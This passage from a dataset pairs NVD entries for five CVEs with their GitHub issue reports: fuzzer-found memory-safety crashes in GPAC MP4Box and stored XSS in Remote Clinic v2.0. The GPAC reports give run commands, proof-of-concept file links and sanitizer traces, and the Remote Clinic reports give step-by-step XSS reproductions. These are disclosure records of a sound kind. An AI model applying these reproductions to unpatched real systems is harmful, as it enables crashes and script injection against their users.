Yanhao.
AddressSanitizer: heap-buffer-overflow in gp_rtp_builder_do_avc ietf/rtp_pck_mpeg4.c:436
https://api.github.com/repos/gpac/gpac/issues/1662/comments
0
2020-12-15T12:02:59Z
2021-01-04T11:04:52Z
https://github.com/gpac/gpac/issues/1662
767,522,021
1,662
1,863
CVE-2020-35980
2021-04-21T16:15:08.687
An issue was discovered in GPAC version 0.8.0 and 1.0.1. There is a use-after-free in the function gf_isom_box_del() in isomedia/box_funcs.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/5aba27604d957e960d8069d85ccaf868f8a7b07a" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1661" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/5aba27604d957e960d8069d85ccaf868f8a7b07a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1661" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/gpac/gpac/issues/1661
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master c4f8bc6e and the latest V1.0.1 d8538e8) I think it is probably due to an imcomplete fix of [#1340](https://github.com/gpac/gpac/issues/1340) 、[#1440](https://github.com/gpac/gpac/issues/1440) and [#1332](https://github.com/gpac/gpac/issues/1332). Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box --extra-ldflags="-ldl -g" $ make ``` Run Command: ``` $ MP4Box -hint $gf_isom_box_del-UAF -out /dev/null ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-c4f8bc6e_poc/gf_isom_box_del-UAF gdb info: ```C Program received signal SIGSEGV, Segmentation fault. __GI___libc_free (mem=0x7ffff6867010) at malloc.c:2958 2958 malloc.c: No such file or directory. (gdb) bt #0 __GI___libc_free (mem=0x7ffff6867010) at malloc.c:2958 #1 0x00000000008d8557 in co64_box_del () #2 0x000000000053f9d4 in gf_isom_box_del () #3 0x000000000053fa07 in gf_isom_box_del () #4 0x000000000053fa07 in gf_isom_box_del () #5 0x000000000053fa07 in gf_isom_box_del () #6 0x000000000053fa07 in gf_isom_box_del () #7 0x000000000053fa07 in gf_isom_box_del () #8 0x0000000000541407 in gf_isom_box_array_del () #9 0x000000000054ab73 in gf_isom_delete_movie () #10 0x000000000054d89d in gf_isom_close () #11 0x00000000004171c3 in mp4boxMain () #12 0x00007ffff6ec7840 in __libc_start_main (main=0x409dc0 <main>, argc=5, argv=0x7fffffffdf78, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdf68) at ../csu/libc-start.c:291 #13 0x0000000000409df9 in _start () ``` ASAN info: ```C ==17415==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000e7f8 at pc 0x000000736277 bp 0x7fff80125400 sp 0x7fff801253f0 READ of size 8 at 0x60600000e7f8 thread T0 #0 0x736276 in gf_isom_box_del isomedia/box_funcs.c:1696 #1 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #2 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #3 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #4 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #5 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #6 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #7 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #8 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #9 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #10 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #11 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #12 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #13 0x7361e6 in gf_isom_box_array_reset isomedia/box_funcs.c:346 #14 0x7361e6 in gf_isom_box_array_del isomedia/box_funcs.c:352 #15 0x7361e6 in gf_isom_box_del isomedia/box_funcs.c:1707 #16 0x738e3e in gf_isom_box_array_reset isomedia/box_funcs.c:346 #17 0x738e3e in gf_isom_box_array_del isomedia/box_funcs.c:352 #18 0x7545bd in gf_isom_delete_movie isomedia/isom_intern.c:908 #19 0x75bf4e in gf_isom_close isomedia/isom_read.c:618 #20 0x42c0c0 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6718 #21 0x7f6c5505883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #22 0x417638 in _start (/opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/build/bin/MP4Box+0x417638) 0x60600000e7f8 is located 24 bytes inside of 56-byte region [0x60600000e7e0,0x60600000e818) freed by thread T0 here: #0 0x7f6c560002ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7361af in gf_isom_box_del isomedia/box_funcs.c:1703 #2 0x78000e in CleanWriters isomedia/isom_store.c:105 #3 0x78000e in WriteInterleaved isomedia/isom_store.c:1728 #4 0x7811f2 in WriteToFile isomedia/isom_store.c:1885 #5 0x75ba6e in gf_isom_write isomedia/isom_read.c:592 #6 0x75bf43 in gf_isom_close isomedia/isom_read.c:616 #7 0x42c0c0 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6718 #8 0x7f6c5505883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) previously allocated by thread T0 here: #0 0x7f6c56000602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x102065d in co64_box_new isomedia/box_code_base.c:65 #2 0x735fdf in gf_isom_box_new_ex isomedia/box_funcs.c:1582 #3 0x735fdf in gf_isom_box_new isomedia/box_funcs.c:1605 #4 0x7feec4 in stbl_AddOffset isomedia/stbl_write.c:1989 #5 0x7feec4 in stbl_SetChunkAndOffset isomedia/stbl_write.c:2090 #6 0x77f65a in DoInterleave isomedia/isom_store.c:1537 #7 0x780197 in WriteInterleaved isomedia/isom_store.c:1665 #8 0x7811f2 in WriteToFile isomedia/isom_store.c:1885 #9 0x75ba6e in gf_isom_write isomedia/isom_read.c:592 #10 0x75bf43 in gf_isom_close isomedia/isom_read.c:616 #11 0x42c0c0 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6718 #12 0x7f6c5505883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) SUMMARY: AddressSanitizer: heap-use-after-free isomedia/box_funcs.c:1696 gf_isom_box_del Shadow bytes around the buggy address: 0x0c0c7fff9ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c0c7fff9cf0: fa fa fa fa fa fa fa fa fa fa fa fa fd fd fd[fd] 0x0c0c7fff9d00: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fa 0x0c0c7fff9d10: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff9d20: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd 0x0c0c7fff9d30: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff9d40: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==17415==ABORTING ``` Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Xiangkun Jia(xiangkun@iscas.ac.cn) 、Marsman1996(lqliuyuwei@outlook.com) and Yanhao.
AddressSanitizer: heap-use-after-free in gf_isom_box_del isomedia/box_funcs.c:1696
https://api.github.com/repos/gpac/gpac/issues/1661/comments
0
2020-12-15T12:01:23Z
2021-01-04T11:04:52Z
https://github.com/gpac/gpac/issues/1661
767,520,741
1,661
1,864
CVE-2020-35981
2021-04-21T16:15:08.720
An issue was discovered in GPAC version 0.8.0 and 1.0.1. There is an invalid pointer dereference in the function SetupWriters() in isomedia/isom_store.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/dae9900580a8888969481cd72035408091edb11b" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1659" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/dae9900580a8888969481cd72035408091edb11b" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1659" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1659
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master c4f8bc6e and the latest V1.0.1 d8538e8) I think it is probably due to an imcomplete fix of [#1485](https://github.com/gpac/gpac/issues/1485) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box --extra-ldflags="-ldl -g" $ make ``` Run Command: ``` $ MP4Box -hint $SetupWriters-null-pointer -out /dev/null ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-c4f8bc6e_poc/SetupWriters-null-pointer gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x00000000005570be in SetupWriters () (gdb) bt #0 0x00000000005570be in SetupWriters () #1 0x0000000000559c36 in WriteInterleaved () #2 0x000000000055a57f in WriteToFile () #3 0x000000000054d70f in gf_isom_write () #4 0x000000000054d893 in gf_isom_close () #5 0x00000000004171c3 in mp4boxMain () #6 0x00007ffff6ec7840 in __libc_start_main (main=0x409dc0 <main>, argc=5, argv=0x7fffffffdf78, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdf68) at ../csu/libc-start.c:291 #7 0x0000000000409df9 in _start () ``` ASAN info: ```C ASAN:SIGSEGV ================================================================= ==27206==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x000000778288 bp 0x7ffccf34fdd0 sp 0x7ffccf34fd40 T0) #0 0x778287 in SetupWriters isomedia/isom_store.c:171 #1 0x77fd9c in WriteInterleaved isomedia/isom_store.c:1611 #2 0x7811f2 in WriteToFile isomedia/isom_store.c:1885 #3 0x75ba6e in gf_isom_write isomedia/isom_read.c:592 #4 0x75bf43 in gf_isom_close isomedia/isom_read.c:616 #5 0x42c0c0 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6718 #6 0x7f218ddaf83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #7 0x417638 in _start (/opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/build/bin/MP4Box+0x417638) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/isom_store.c:171 SetupWriters ==27206==ABORTING ``` Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Xiangkun Jia(xiangkun@iscas.ac.cn) 、Marsman1996(lqliuyuwei@outlook.com) and Yanhao.
A NULL pointer dereference in the function SetupWriters isomedia/isom_store.c:171
https://api.github.com/repos/gpac/gpac/issues/1659/comments
0
2020-12-15T11:57:41Z
2021-01-04T11:04:51Z
https://github.com/gpac/gpac/issues/1659
767,517,846
1,659
1,865
CVE-2020-35982
2021-04-21T16:15:08.757
An issue was discovered in GPAC version 0.8.0 and 1.0.1. There is an invalid pointer dereference in the function gf_hinter_track_finalize() in media_tools/isom_hinter.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/a4eb327049132359cae54b59faec9e2f14c5a619" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1660" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/a4eb327049132359cae54b59faec9e2f14c5a619" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1660" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1660
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master c4f8bc6e and the latest V1.0.1 d8538e8) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box --extra-ldflags="-ldl -g" $ make ``` Run Command: ``` $ MP4Box -hint $gf_hinter_track_finalize-null-pointer -out /dev/null ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-c4f8bc6e_poc/gf_hinter_track_finalize-null-pointer gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x000000000060eab8 in gf_hinter_track_finalize () (gdb) bt #0 0x000000000060eab8 in gf_hinter_track_finalize () #1 0x000000000040ad7c in HintFile () #2 0x00000000004172b2 in mp4boxMain () #3 0x00007ffff6ec7840 in __libc_start_main (main=0x409dc0 <main>, argc=5, argv=0x7fffffffdf68, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdf58) at ../csu/libc-start.c:291 #4 0x0000000000409df9 in _start () ``` ASAN info: ```C Hinting file with Path-MTU 1450 Bytes Hinting track ID 1 - Type "avc1:avc1" (H264) - BW 3 kbps ASAN:SIGSEGV ================================================================= ==20754==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000003 (pc 0x00000092e516 bp 0x7fffe5a7ede0 sp 0x7fffe5a79300 T0) #0 0x92e515 in gf_hinter_track_finalize media_tools/isom_hinter.c:970 #1 0x418f85 in HintFile /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:1448 #2 0x42bdc7 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6641 #3 0x7fd6bcc3b83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #4 0x417638 in _start (/opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/build/bin/MP4Box+0x417638) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV media_tools/isom_hinter.c:970 gf_hinter_track_finalize ==20754==ABORTING ``` Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Xiangkun Jia(xiangkun@iscas.ac.cn) 、Marsman1996(lqliuyuwei@outlook.com) and Yanhao.
A NULL pointer dereference in the function gf_hinter_track_finalize in media_tools/isom_hinter.c:970
https://api.github.com/repos/gpac/gpac/issues/1660/comments
0
2020-12-15T11:59:14Z
2021-01-04T11:04:52Z
https://github.com/gpac/gpac/issues/1660
767,519,058
1,660
1,866
CVE-2021-31327
2021-04-21T16:15:08.863
Stored XSS in Remote Clinic v2.0 in /medicines due to Medicine Name Field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/14" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/remoteclinic/RemoteClinic/issues/14
[ "Exploit", "Third Party Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
Stored XSS vulnerability in Version 2.0 which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: http://localhost/RemoteClinic/medicines Step to Reproduce: 1) Login in Application as Doctor. 2) When you scroll down the main dashboard page, there is medicines options, Click "New Medicine". ![1](https://user-images.githubusercontent.com/81484562/114690728-6dbc9a80-9d30-11eb-9b5c-6698fa43261a.JPG) 3) Here is a "Medicine Name" Field which is vulnerable to XSS. Inject XSS Payload: ![Capture1](https://user-images.githubusercontent.com/81484562/114692210-dbb59180-9d31-11eb-9a13-0dce8cb00bf4.JPG) ![2](https://user-images.githubusercontent.com/81484562/114691079-bd9b6180-9d30-11eb-8755-9d6183357354.JPG) 4) You can see there is client side validation on Medicine Name with maxlength is 30 but not validate on server side. ![3](https://user-images.githubusercontent.com/81484562/114691398-10751900-9d31-11eb-8fe7-71fdeb4a7cb4.JPG) 5) Change maxlength to 100. ![4](https://user-images.githubusercontent.com/81484562/114691479-2b478d80-9d31-11eb-962c-a8d820109b34.JPG) 6) Now Click on Register. ![5](https://user-images.githubusercontent.com/81484562/114691588-461a0200-9d31-11eb-9beb-f664a6cfbc13.JPG) 7) XSS Executed on medicines/new.php ![6](https://user-images.githubusercontent.com/81484562/114691856-88434380-9d31-11eb-9b2f-5a9e3d2bbeb8.JPG) 8) Now go to /medicines, Click on Show All. ![8](https://user-images.githubusercontent.com/81484562/114691971-a315b800-9d31-11eb-82f0-efc6ced12214.JPG) 9) XSS Executed on /medicines. ![7](https://user-images.githubusercontent.com/81484562/114692089-b9bc0f00-9d31-11eb-8033-fd20c5769bd7.JPG)
Stored XSS vulnerability in /medicines
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/14/comments
2
2021-04-14T10:01:09Z
2021-04-23T20:23:02Z
https://github.com/remoteclinic/RemoteClinic/issues/14
857,735,531
14
1,867
CVE-2021-31329
2021-04-21T16:15:08.893
Cross Site Scripting (XSS) in Remote Clinic v2.0 via the "Chat" and "Personal Address" field on staff/register.php
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/remoteclinic/RemoteClinic/issues/16
[ "Exploit", "Third Party Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
Stored XSS vulnerability in Version 2.0 which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: http://localhost/RemoteClinic/staff/my-profile.php Step to Reproduce: 1) Login in Application as Doctor. 2) Create New Staff Member. ![1](https://user-images.githubusercontent.com/81484562/114712413-7ff70280-9d49-11eb-9068-846c6eccaf5b.JPG) 3) Register as a Doctor. ![1](https://user-images.githubusercontent.com/81484562/114712586-b0d73780-9d49-11eb-9615-7fe8fe513c34.JPG) 4) Here is two fields "Chat" and "Personal Address" which is vulnerable to XSS, inject with XSS Payload: ![Capture1](https://user-images.githubusercontent.com/81484562/114712792-ef6cf200-9d49-11eb-98ae-1c1a528a4b35.JPG) ![2](https://user-images.githubusercontent.com/81484562/114712922-0d3a5700-9d4a-11eb-818a-2bd5612f8b7b.JPG) 5) Now Click on Register. ![2 - Copy](https://user-images.githubusercontent.com/81484562/114713022-26430800-9d4a-11eb-9f71-9dfc706907b1.JPG) 6) Profile Created. ![3](https://user-images.githubusercontent.com/81484562/114713536-a8cbc780-9d4a-11eb-8145-a240d29deca7.JPG) 7) Now Signout. ![4](https://user-images.githubusercontent.com/81484562/114713584-b7b27a00-9d4a-11eb-80b2-960085248f73.JPG) 8) Login with that Staff Member which you registered as a Doctor. ![5](https://user-images.githubusercontent.com/81484562/114713662-c862f000-9d4a-11eb-94cb-6a27012c6dc8.JPG) 9) Now go to My Profile. ![6](https://user-images.githubusercontent.com/81484562/114713763-e03a7400-9d4a-11eb-90ae-f2d5266cce96.JPG) 10) XSS Executed. 